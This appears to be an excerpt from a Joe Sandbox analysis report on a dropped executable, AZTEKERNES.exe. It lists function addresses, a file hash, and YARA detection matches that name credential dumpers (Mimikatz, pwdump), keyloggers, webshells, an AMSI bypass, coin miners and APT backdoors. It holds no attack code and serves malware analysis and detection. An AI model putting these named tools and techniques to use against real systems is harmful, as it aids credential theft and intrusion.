Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F247B	5_2_022F247B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC72	5_2_022FAC72
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9049	5_2_022F9049
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9043	5_2_022F9043
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC41	5_2_022FAC41
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FA0AB	5_2_022FA0AB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9C86	5_2_022F9C86
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAC92	5_2_022FAC92
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FACC6	5_2_022FACC6
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F84DB	5_2_022F84DB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F34DA	5_2_022F34DA
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F6134	5_2_022F6134
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9D1F	5_2_022F9D1F
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FA51B	5_2_022FA51B
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F4D6E	5_2_022F4D6E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9D4E	5_2_022F9D4E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F4D43	5_2_022F4D43
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F81AA	5_2_022F81AA
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022FAD8E	5_2_022FAD8E
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9DE9	5_2_022F9DE9
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F91F6	5_2_022F91F6
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F8DDD	5_2_022F8DDD
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F81DB	5_2_022F81DB
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F61D1	5_2_022F61D1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 13_2_00A0B136	13_2_00A0B136
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57C86BC	45_2_00007FF7B57C86BC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57D3728	45_2_00007FF7B57D3728
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DD038	45_2_00007FF7B57DD038
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57CFF90	45_2_00007FF7B57CFF90
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57C9CFC	45_2_00007FF7B57C9CFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F15F8	45_2_00007FF7B57F15F8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5837600	45_2_00007FF7B5837600
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5839520	45_2_00007FF7B5839520
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57EC52C	45_2_00007FF7B57EC52C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B580490C	45_2_00007FF7B580490C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57EA818	45_2_00007FF7B57EA818
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583B88C	45_2_00007FF7B583B88C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B58477FC	45_2_00007FF7B58477FC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582F76C	45_2_00007FF7B582F76C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583C21C	45_2_00007FF7B583C21C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B580A288	45_2_00007FF7B580A288
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57E9278	45_2_00007FF7B57E9278
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57EB20C	45_2_00007FF7B57EB20C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B58534D4	45_2_00007FF7B58534D4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5852504	45_2_00007FF7B5852504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57C1420	45_2_00007FF7B57C1420
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F6480	45_2_00007FF7B57F6480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5842480	45_2_00007FF7B5842480
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582E410	45_2_00007FF7B582E410
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F0320	45_2_00007FF7B57F0320
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B584837C	45_2_00007FF7B584837C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5825ED0	45_2_00007FF7B5825ED0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583BE48	45_2_00007FF7B583BE48
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583DD9C	45_2_00007FF7B583DD9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5822DD4	45_2_00007FF7B5822DD4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5841E00	45_2_00007FF7B5841E00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5821D78	45_2_00007FF7B5821D78
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57CB0C8	45_2_00007FF7B57CB0C8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5837108	45_2_00007FF7B5837108
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583C034	45_2_00007FF7B583C034
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F502C	45_2_00007FF7B57F502C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5827050	45_2_00007FF7B5827050
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583D058	45_2_00007FF7B583D058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B584B058	45_2_00007FF7B584B058
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DDFB4	45_2_00007FF7B57DDFB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5845F9C	45_2_00007FF7B5845F9C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57D1FA8	45_2_00007FF7B57D1FA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57EFFA8	45_2_00007FF7B57EFFA8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DEFCC	45_2_00007FF7B57DEFCC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F0AB0	45_2_00007FF7B57F0AB0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583BA74	45_2_00007FF7B583BA74
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57EAA68	45_2_00007FF7B57EAA68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583D9D0	45_2_00007FF7B583D9D0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57CB944	45_2_00007FF7B57CB944
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5841950	45_2_00007FF7B5841950
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583CCC8	45_2_00007FF7B583CCC8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F3CE0	45_2_00007FF7B57F3CE0
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57E1D00	45_2_00007FF7B57E1D00
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B583BC60	45_2_00007FF7B583BC60
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57E3C87	45_2_00007FF7B57E3C87
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57F1C10	45_2_00007FF7B57F1C10
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5839B34	45_2_00007FF7B5839B34

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe 9AAE447ECF7C9B42058153993D02DCC0EF2D92984A0987CF543E6E132740E2EA

Source: 38.3.MpSigStub.exe.138bd31742c.64.raw.unpack, type: UNPACKEDPE	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd21de7c.219.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bd21de7c.147.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bdbb7ebd.124.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd223b1a.220.unpack, type: UNPACKEDPE	Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138bd223b1a.220.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138bea6a936.114.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bea6a936.114.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 38.3.MpSigStub.exe.138bea6a936.114.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138beac794e.189.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 38.3.MpSigStub.exe.138beac794e.189.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 38.3.MpSigStub.exe.138beac794e.189.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 38.3.MpSigStub.exe.138bdbb68b9.152.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bd223b1a.148.raw.unpack, type: UNPACKEDPE	Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 38.3.MpSigStub.exe.138be3e1c0a.122.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 38.3.MpSigStub.exe.138bcde53e1.182.raw.unpack, type: UNPACKEDPE	Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bea69132.113.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bea69132.113.raw.unpack, type: UNPACKEDPE	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 38.3.MpSigStub.exe.138bea69132.113.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138bdbb54b5.151.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack, type: UNPACKEDPE	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 38.3.MpSigStub.exe.138be2d6086.59.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 38.3.MpSigStub.exe.138be2d6086.59.raw.unpack, type: UNPACKEDPE	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 38.3.MpSigStub.exe.138bd61fbe2.56.unpack, type: UNPACKEDPE	Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: 38.3.MpSigStub.exe.138bce14cd2.18.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 38.3.MpSigStub.exe.138be8f860a.191.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 38.3.MpSigStub.exe.138be22418a.58.raw.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
